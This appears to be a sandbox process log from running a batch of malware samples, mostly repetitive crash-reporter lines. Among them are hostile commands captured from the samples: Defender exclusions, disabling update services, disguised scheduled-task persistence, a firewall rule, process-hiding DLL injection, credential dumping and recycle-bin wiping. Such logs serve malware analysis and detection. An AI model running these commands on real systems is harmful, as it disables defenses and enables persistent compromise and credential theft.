C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1304
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 11132 -ip 11132
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 11132 -s 572
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1312
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1264
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1364
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1084
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1312
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1364
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1492
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1364
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1364
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1136
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1488
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\ProgramData\pinterests\XRJNZC.exe
C:\ProgramData\pinterests\XRJNZC.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1328
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1492
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1416
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1148
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1488
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1308
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1308
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1308
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1492
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1148
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1136
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1148
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5276 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1148
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1460
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-22-05\" -spe -an -ai#7zMap1680:88:7zEvent19774
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1148
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1468
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1148
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1132
C:\Users\Admin\Downloads\2023-11-22-05\6b0516642e5baf8ceaea3fabe4456f60f643531befc1185102215fcf28e4017b.exe
"C:\Users\Admin\Downloads\2023-11-22-05\6b0516642e5baf8ceaea3fabe4456f60f643531befc1185102215fcf28e4017b.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1588
C:\Users\Admin\Downloads\2023-11-22-05\bca02faf8b705cffad72deb87ef895ce6626636d498e05b274b079c9ace3dc5b.exe
"C:\Users\Admin\Downloads\2023-11-22-05\bca02faf8b705cffad72deb87ef895ce6626636d498e05b274b079c9ace3dc5b.exe"
C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe
"C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe"
C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe
"C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe"
C:\Users\Admin\Downloads\2023-11-22-05\135cdbfa671ffafa1c728ec8f270ca055d20e1669cd809d72273da202028a64f.exe
"C:\Users\Admin\Downloads\2023-11-22-05\135cdbfa671ffafa1c728ec8f270ca055d20e1669cd809d72273da202028a64f.exe"
C:\Users\Admin\Downloads\2023-11-22-05\8195afbce4ef411cd0b1ac7cc27e3d66b575df16a5433b60aa0e7a3529f465ef.exe
"C:\Users\Admin\Downloads\2023-11-22-05\8195afbce4ef411cd0b1ac7cc27e3d66b575df16a5433b60aa0e7a3529f465ef.exe"
C:\Users\Admin\Downloads\2023-11-22-05\595586e83cde2e83072b025e5199b451eed4a290b3cd7640c7e6df90ba364aa3.exe
"C:\Users\Admin\Downloads\2023-11-22-05\595586e83cde2e83072b025e5199b451eed4a290b3cd7640c7e6df90ba364aa3.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1304
C:\Users\Admin\Downloads\2023-11-22-05\e340efd16c8fc3ed295ec674e97bed2ec4bc1e2a14a8089537b03da23f0f47ff.exe
"C:\Users\Admin\Downloads\2023-11-22-05\e340efd16c8fc3ed295ec674e97bed2ec4bc1e2a14a8089537b03da23f0f47ff.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 LG" /sc ONLOGON /rl HIGHEST
C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
C:\Users\Admin\Downloads\2023-11-22-05\6f735da34e90dce7418f49a7d25fa183650fd9fe681804a9ab5f80d3005b1c5d.exe
"C:\Users\Admin\Downloads\2023-11-22-05\6f735da34e90dce7418f49a7d25fa183650fd9fe681804a9ab5f80d3005b1c5d.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
"C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 11268 -ip 11268
C:\Users\Admin\Downloads\2023-11-22-05\08cc8cfcabf0fe26de3d9bdfd6e705eb1e70f1b3e9f880f8a50cb1aee051cee0.exe
"C:\Users\Admin\Downloads\2023-11-22-05\08cc8cfcabf0fe26de3d9bdfd6e705eb1e70f1b3e9f880f8a50cb1aee051cee0.exe"
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 11268 -s 812
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 11412 -ip 11412
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 11412 -s 812
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1560
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\ProgramData\pinterests\XRJNZC.exe
C:\ProgramData\pinterests\XRJNZC.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1304
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1544
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1460
C:\Users\Admin\Downloads\2023-11-22-05\8195afbce4ef411cd0b1ac7cc27e3d66b575df16a5433b60aa0e7a3529f465ef.exe
"C:\Users\Admin\Downloads\2023-11-22-05\8195afbce4ef411cd0b1ac7cc27e3d66b575df16a5433b60aa0e7a3529f465ef.exe"
C:\Users\Admin\Downloads\2023-11-22-05\8195afbce4ef411cd0b1ac7cc27e3d66b575df16a5433b60aa0e7a3529f465ef.exe
"C:\Users\Admin\Downloads\2023-11-22-05\8195afbce4ef411cd0b1ac7cc27e3d66b575df16a5433b60aa0e7a3529f465ef.exe"
C:\Users\Admin\Downloads\2023-11-22-05\8195afbce4ef411cd0b1ac7cc27e3d66b575df16a5433b60aa0e7a3529f465ef.exe
"C:\Users\Admin\Downloads\2023-11-22-05\8195afbce4ef411cd0b1ac7cc27e3d66b575df16a5433b60aa0e7a3529f465ef.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1544
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1460
C:\Windows\SysWOW64\help.exe
"C:\Windows\SysWOW64\help.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1132
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1152
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
"C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1564
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1552
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1588
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\2023-11-22-05\135cdbfa671ffafa1c728ec8f270ca055d20e1669cd809d72273da202028a64f.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\nIdXvyexFmXwy.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nIdXvyexFmXwy" /XML "C:\Users\Admin\AppData\Local\Temp\tmpEECE.tmp"
C:\Users\Admin\Downloads\2023-11-22-05\135cdbfa671ffafa1c728ec8f270ca055d20e1669cd809d72273da202028a64f.exe
"C:\Users\Admin\Downloads\2023-11-22-05\135cdbfa671ffafa1c728ec8f270ca055d20e1669cd809d72273da202028a64f.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1564
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1588
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1460
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1152
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1364
C:\Windows\SysWOW64\cmd.exe
cmd /c rd /s /q c:\$Recycle.bin
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120
C:\Windows\SysWOW64\cmd.exe
cmd /c rd /s /q c:\recycler
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1576
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c rd /s /q c:\$Recycle.bin
C:\Windows\SysWOW64\cmd.exe
cmd /c rd /s /q c:\recycler
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1152
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\cmd.exe
cmd /c rd /s /q c:\$Recycle.bin
C:\Windows\SysWOW64\cmd.exe
cmd /c rd /s /q c:\recycler
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1416
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1520
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1552
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1600
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1552
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1552
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe
C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe /stext "C:\Users\Admin\AppData\Local\Temp\eggdbczawjfttjodwuosrgpetravvpjylb"
C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe
C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe /stext "C:\Users\Admin\AppData\Local\Temp\pamobvj"
C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe
C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe /stext "C:\Users\Admin\AppData\Local\Temp\rczgcnuvxa"
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1620
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
